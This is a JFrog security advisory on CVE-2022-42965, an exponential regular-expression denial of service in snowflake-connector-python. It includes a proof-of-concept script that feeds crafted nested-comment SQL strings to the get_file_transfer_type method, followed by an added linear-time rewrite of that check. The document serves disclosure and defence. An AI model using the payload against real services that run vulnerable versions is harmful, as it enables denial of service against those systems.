JFrog Security Research

XRAY-257185 - snowflake-connector-python ReDoS

CVE-2022-42965 | CVSS 3.7

JFrog Severity:low

Published 15 Oct. 2022 | Last updated 20 Nov. 2022

Exponential ReDoS in snowflake-connector-python leads to denial of service


snowflake-connector-python (,2.8.1], Fixed in 2.8.2

An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the snowflake-connector-python PyPI package, when an attacker is able to supply arbitrary input to the undocumented get_file_transfer_type method.

import time
from snowflake.connector.cursor import SnowflakeCursor

for i in range(100):
    # Each extra repetition adds one more nested "/*/get */" fragment, so the
    # time spent in the vulnerable method grows exponentially with i
    sql = '/**/\n' + '\t/*/get\t*/\t/**/\n' * i + '\t*/get\n'
    start_time = time.time()
    SnowflakeCursor.get_file_transfer_type(sql)  # the undocumented method named above
    print("--- i=%d: %s seconds ---" % (i, time.time() - start_time))
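As an added example (not JFrog's advisory code and not the connector's own implementation), the classification the vulnerable method performs, written as a single left-to-right scan instead of a backtracking regex, so the nested-comment payload above costs linear time; the handled grammar (only `/* */` and `--` comments, only a leading PUT/GET keyword) is an assumption.

```python
import re
import time


def strip_sql_comments(sql: str) -> str:
    """Remove /* ... */ and -- ... comments in one pass; O(len(sql))."""
    out = []
    i, n = 0, len(sql)
    while i < n:
        if sql.startswith("/*", i):
            end = sql.find("*/", i + 2)
            if end == -1:  # unterminated block comment swallows the rest
                break
            i = end + 2
        elif sql.startswith("--", i):
            end = sql.find("\n", i)
            i = n if end == -1 else end + 1
        else:
            out.append(sql[i])
            i += 1
    return "".join(out)


def file_transfer_type(sql: str):
    """Return 'PUT', 'GET' or None without any regex that can backtrack."""
    stripped = strip_sql_comments(sql).lstrip()
    m = re.match(r"(PUT|GET)\b", stripped, re.IGNORECASE)  # fixed-length, no nesting
    return m.group(1).upper() if m else None


def redos_payload(i: int) -> str:
    """The nested-comment input from the advisory's proof of concept."""
    return "/**/\n" + "\t/*/get\t*/\t/**/\n" * i + "\t*/get\n"


def classify_timed(sql: str):
    """Classify and report wall-clock seconds, to compare against the PoC."""
    start = time.time()
    result = file_transfer_type(sql)
    return result, time.time() - start


if __name__ == "__main__":
    for i in (10, 100, 1000):
        result, secs = classify_timed(redos_payload(i))
        print("i=%d -> %r in %.6f seconds" % (i, result, secs))
```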

No mitigations are supplied for this issue